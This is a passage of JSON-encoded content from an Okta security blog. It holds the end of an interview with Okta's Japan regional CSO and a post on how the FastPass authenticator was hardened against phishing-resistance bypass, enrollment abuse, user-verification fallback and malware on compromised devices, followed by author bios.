across the entire corporate group, while also having to collaborate with members not only in Japan but also overseas.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Additionally, identity verification using Individual Number cards is becoming increasingly common and is a topic unique to Japan that has been gaining discussion in recent years.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is the most significant change you’ve seen in the cybersecurity industry in your career to-date?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The concept of Zero Trust has emerged. I think that the emphasis on implicit relationships of trust is also a characteristic of Japan. With the diversification of working styles and the globalization of business, and with reports of actual damage, the idea that attacks are inevitable has gradually become more widespread, and I think it is now gaining considerable support. Many companies have yet to fully consider measures against internal crime, but I think that taking measures will also protect employees, so I would like to focus on this.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How do you employ \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/04/the-story-behind-oktas-values/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s corporate values\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in your day to day?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In Japan, Okta products are delivered via partners, so I consider that our customers include both end users and partners, and I\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" “Love our customers.”\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I feel rewarded by the fact that I can build trusting relationships and communicate with various customer CISOs etc, with the responsibility of being the only Japanese person on the Okta’s security team. My biggest mission is to properly understand what issues Japanese customers have, and to reflect this in the activities of the global security team.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/oktane-2024-announcements/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Oktane24\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" brought numerous exciting announcements, which are you most looking forward to?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I’m looking forward to IPSIE, the Interoperability Profiling for Secure Identity in the Enterprise - improving industry standards is one of the pillars of the Okta Secure Identity Commitment (OSIC.) By promoting standards together with various technology companies, I hope that not only Okta but the entire industry will become a safer society.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you could provide a few short cybersecurity words of wisdom to Okta customers, what would they be?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I feel it is a shame not to leverage higher assurance options that can be used without requiring much additional cost or effort. For example, since you are already using Okta I recommend for you to make the most of the options that can enhance security, such as FastPass and the migration from Okta Classic to the Okta Identity Engine, or OIE.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nKeiko was recently interviewed by \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://scan.netsecurity.ne.jp/article/2025/01/20/52186.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"ScanNetSecurity\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on why she joined Okta as Japan’s Regional CSO and her mindset to fulfill her mission. She was also featured by \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://enterprisezine.jp/article/detail/20716\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"EnterpriseZine\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for a profile piece on her career in Identity management and her vision for its future in the Japan region. Keiko also shared insights as a speaker at the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://fidoalliance.org/content-2024-fido-alliance-seoul-public-seminar-unlocking-a-secure-tomorrow-with-passkeys/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"2024 Fido Alliance Seoul Public Seminar\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and at the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://authenticatecon.com/event/authenticate-2024-conference/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authenticate 2024 Conference.\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"CSO Conversations is a blog series interviewing Okta’s Regional CSOs supporting David Bradbury, Okta’s Chief Security Officer in providing the best service for our customers. Okta’s Regional CSOs are integral to Okta’s Security Trust and Culture team, building and strengthening trusted advisor relationships with global security thought leadership."},"updatedAt":"2025-02-12T19:43:03.415Z","secAuthor":[{"id":"69fdea2c-e94b-5579-916f-c112d6e0926e","bio":{"bio":"Keiko Itakura supports Okta’s Japan region by providing customers and prospects with security program assurance and best practice advisories. Keiko brings approximately 20 years of experience in the Information Technology space including Microsoft Japan, IBM and the Rakuten Group, at various levels with a key focus on security and Identity management. Keiko’s downtime is often spent watching sports, driving or spending quality time with her dog.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3ms5EsNFQvq2m8TJSk2xdF/f08f008a8efb8b07829c639a391172b7/Keiko_Itakura.png"},"name":"Keiko Itakura","jobTitle":"Regional CSO, Japan","slug":"/hackers/keiko-itakura","node_locale":"en"}]},{"slug":"/fastpasshardening","id":"e78d0de2-8569-5025-9251-9bca33a4d374","title":"FastPass: The battle-hardened authenticator","date":"2024-08-08T01:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has experienced strong growth in the enterprise market, with many customers drawn to the promise of protecting their workforce with phishing-resistant authentication. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass is the fastest growing authentication method in Okta Workforce Identity. Our goal is for FastPass to be the most secure, usable, and deployable enterprise authenticator, and we are committed to maintaining a leadership position in protecting against the evolving threat landscape. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass delivers a simple passwordless user experience, including zero or one-touch biometric authentication on all major operating system platforms. Okta secures this experience with device-bound, phishing-resistant authentication and device posture enforcement.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As more organizations go passwordless, Okta FastPass has benefited from the research of red teams commissioned by these customers to put the claimed security properties of FastPass to the test. Okta has also benefited from testing conducted by hundreds of researchers via a public bug bounty program. The Okta Verify client has been in scope for rewards for several years, with the FastPass method added in October 2023.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the reasons Okta offers public bug bounties is because very often, security research is a driver of product innovation. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this blog post, we summarize close to two years of FastPass innovations, many of which were driven by internal reviews conducted by Okta’s internal Product Security team, testing conducted by customer red teams, and from independent security researchers contributing to Okta’s public bug bounty programs.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The goal throughout this journey has been to narrow the range of opportunities for an adversary that targets a user protected by FastPass.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Most research falls into one of the following categories: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bypassing Enforcement of Phishing Resistance,\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Attacking Factor Enrollment and Recovery;\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bypassing User Verification;\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Local Attacks on a Previously Compromised Device.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bypassing Phishing Resistance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The most popular phishing-resistant method of user sign-in requires an authenticator that won’t issue credentials to any other site than a trusted origin established during user enrollment. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Using Okta FastPass, a user’s credential is cryptographically bound to a specific Okta Org (tenant). This binding mitigates the most common means by which user credentials get stolen: when users are tricked into sharing them via a malicious phishing site or some other form of social engineering. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As this \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/11/a-deep-dive-into-okta-fastpass/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"2022 deep dive\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on Okta FastPass explains, the methods (or probing schemes) by which any given operating system (Android, iOS, MacOS and Windows) can support phishing resistance varies. Okta’s first engineering challenge was how to deliver a consistent, phishing-resistant experience on all four major OS platforms and browsers. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Some of the most useful early research into FastPass identified how an attacker might exploit scenarios in which a probing scheme that supports phishing resistance would fall back to a scheme that doesn’t. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To trigger these conditions, attackers typically required human interaction: that is, these conditions could only be exploited if the attacker first convinced a user to perform a desired action.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In response, Okta introduced a policy configuration option that would only allow authentication requests from phishing-resistant flows and deny all others (see below). \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4ZHu7dFJjv0auR0sK7RL6y\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today, claims that phishing resistance can be “bypassed” tend to rely on a customer configuration in which phishing resistance is not enforced in policy. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Attacking Factor Enrollment and Recovery\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The phishing resistance offered by FastPass eliminates the threat posed by a huge range of credential-based attacks. Naturally, we have observed security research shift to targeting enrollment and recovery flows, where phishing resistance cannot as easily be guaranteed. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The fundamental problem to solve was that the methods by which most users would verify their identity before enrolling a phishing-resistant factor were not themselves phishing resistant. This could be described as a “chicken and egg” problem. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At first, Okta solved this by requiring two factors of authentication to verify a user identity before enrolling another factor. With this step in place, adversaries would need to achieve a lot within the space of a few minutes: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Convince a target to start (but not complete) a FastPass enrolment process, \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Convince the target to share their Okta credentials (or obtain credentials by other means, such as credential stuffing or phishing), \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Start their own FastPass enrollment (on an adversary device), and then \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Convince the target to accept a Push notification issued or share an OTP initiated by the attacker. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This set the bar for interaction with the target very high, but we could foresee scenarios in which voice calls or instant messaging services could be utilized to make the attack effective. Some customers used a combination of MFA enrolment policies and Workflows to account for these risks. Once again, ongoing security research drove Okta to further harden our enrollment process.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta administrators can now make use of several \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/authenticators/require-phishing-resistant-authenticator.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"phishing-resistant factor enrollment policy options\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". These include an ability to exclude low assurance factors from enrollment flows, or to require verification of a user’s identity via a phishing resistant factor before the user can enroll in any other new factor. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Additionally, organizations can now pre-enroll users in roaming FIDO2 security keys via \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/authenticators/onboard-with-preenrolled-yubikey.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s integration with Yubico\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and can also use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/eu/en-us/content/topics/end-user/ov-ios-add-acc-bluetooth.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"features in which FastPass can be installed on a new device\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" if it is within physical proximity of an existing registered device. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bypassing User Verification\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One reason signing in with FastPass is so “fast” is because the cryptographic relationship between a user device and the Okta service established at enrollment counts as a possession factor in an authentication flow. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the user can efficiently verify their identity to the device using an inherence factor (biometric) or knowledge factor (device passcode or PIN), they can subsequently satisfy two passwordless factors in 2-3 seconds.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Distinct from the conversation about whether an authentication method is phishing resistant, we must also account for how the user validates their identity to their device. User verification checks protect against local attacks in which an adversary gains physical access to a target’s device. If, for example, a user in a shared office doesn’t lock their device, and leaves it unattended, there needs to be a means of preventing a colleague from accessing resources on the absent user's behalf from the unattended device.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The focus for security researchers has been how to force a user verification process to fallback from a biometric challenge to a verification method an attacker could more easily defeat. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To account for this, Okta’s policy engine considers FastPass as only a single (possession) factor of authentication if a biometric check fails or is abandoned by the user.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta administrators can decide what methods of user verification meet their requirements for any given application. Authentication policies can be configured to require biometrics only, a choice of biometrics or PIN/passcodes, or to make user verification optional.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Local Attacks on Compromised Devices\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over two years in the market, security research (and the ongoing efforts of Okta’s engineering teams) have effectively isolated opportunities to attack FastPass down to a final remaining category: the abuse of a FastPass from a malware-compromised user device.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are many perspectives on what role an Identity Provider can play in this scenario. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To be clear: Okta is not an endpoint security company, meaning there are limits to what an authenticator can do in the context of a compromised device.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The same applies to FIDO2 authenticators, which offer similar qualities as FastPass. The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://fidoalliance.org/specs/common-specs/fido-security-ref-v2.1-rd-20210525.html#fido-security-assumptions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"specifications for FIDO2\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (and its predecessors) state clearly that the security claims of phishing-resistant authentication should not be expected to withstand a malware-compromised host. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The applications involved in a FIDO operation can be relied on as “trustworthy agents of the user”, the alliance says, up until the point of malicious computation on the user’s device.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“Malicious code privileged at the level of the trusted computing base can always violate [FIDO 2 security properties]”.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Arguably, if your authentication method can isolate attacker opportunities down to the compromise of a user endpoint, defenders are winning! \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But that’s not to say we shouldn’t all aim higher. At Okta, we love a challenge. This is an area where, once again, our response to security research is driving innovation in Okta products. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today, Okta’s policy engine gives administrators the ability to restrict access to any given resource based on whether a device is registered, managed and/or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"demonstrating compliance with a security baseline\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the early days of testing these device management features, Okta’s internal testing revealed that a user with root access to a managed device could remove and transfer its non-hardware bound certificate to an unmanaged device. Similarly, session identifiers used to identify whether a mobile device was managed could also be accessed and replayed from an unmanaged device.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Addressing these issues inspired several features that further expanded FastPass capabilities, including:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/device-assurance.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Device Assurance\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" checks for “jailbroken” or “rooted” devices. Today, Okta Identity Engine administrators can write policies that approve or deny access to a resource based on these checks. These checks are performed by FastPass.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FastPass Silent Context Rechecks\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", through which a user session is terminated if a user accesses an application from a new device mid-session (assuming device context is evaluated in the authentication policy for that app.)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our next challenge is to ensure that FastPass can’t be invoked by malware running in a user context on a device.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To date, Okta’s response has included:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"EDR/XDR Integrations\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" allow FastPass to check the security posture of an endpoint as evaluated by the customer’s choice of endpoint security tools at the point of authentication. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/authenticators/trusted-app-filters-for-fastpass.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trusted App Filters\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\": an ability for administrators to allowlist a specific binary that is authorized to call the Okta Verify client.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Verify also includes self-tampering protection on supported platforms, to prevent reverse engineering and unauthorized modifications of Okta FastPass. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta's North Star is to ensure malware cannot compromise FastPass authentication without root access to the device. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Anticipating future attacks against FastPass\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has made great progress on hardening FastPass in a relatively short period of time using threat-informed product development. We are very grateful to the security researchers inside and out of Okta for helping get it there.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Still, we know threat actors will continue to innovate. Okta will continue to strive to compress the feedback loop between security research and product innovation.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given recent investments Okta has made to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/protectingadminsessions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"constrain session tokens\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/api.htm#editallowednetworkzones\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"API tokens\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (by client or location), it’s prudent to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.linkedin.com/posts/andysteingruebl_fighting-cookie-theft-using-device-bound-activity-7211087871741419520-PfZP/?utm_source=share&utm_medium=member_desktop\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"anticipate\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that adversaries will see a need to again pivot to malware-based attacks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We hope this short history of FastPass hardening illustrates Okta’s determination to bring best-in-class security to phishing resistant, passwordless authentication. \",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"A short history of hardening Okta FastPass."},"updatedAt":"2025-02-10T00:14:20.398Z","secAuthor":[{"id":"8528ce08-133a-57ef-acc1-823b04af8cc3","bio":{"bio":"Johannes leads Okta's Zero-Trust architecture and its FastPass enterprise authenticator. Using feedback from small and large enterprise companies as well as security researchers, he is continuously working on making strong phishing resistant authentication available to everyone and in every scenario while also mitigating new attack patterns in a world without passwords. He is passionate about identity and security standards, and is active in the FIDO Alliance."},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/7wQGE40H11s37DZaw9OprP/d33bdbe4c1fe8340995e0949585aa810/js_profile.jpg"},"name":"Johannes Stockmann","jobTitle":"Senior Software Architect","slug":"/hackers/johannes-stockmann","node_locale":"en"},{"id":"c235ce3a-92ed-529f-8c59-c8f845622414","bio":{"bio":"Dan is a VP of Engineering at Okta, focusing on Access Management in the Workforce Identity Cloud. He joined Okta to make the world safer and more prosperous by mitigating the dangers of threat actors bypassing access restrictions through better technology, and ensuring end users are delighted by a frictionless, flexible experience of getting their work done instead of being sent through endless frustrating speed bumps. Prior to Okta, Dan enjoyed a long career working as a leader and developer on a variety of products, from the metal up to the cloud."},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/BRLA6lxnpMPhu6417V1jh/728f80c09ee397529628653da15555ba/dp_lowres.jpeg"},"name":"Dan Post","jobTitle":"VP, Development 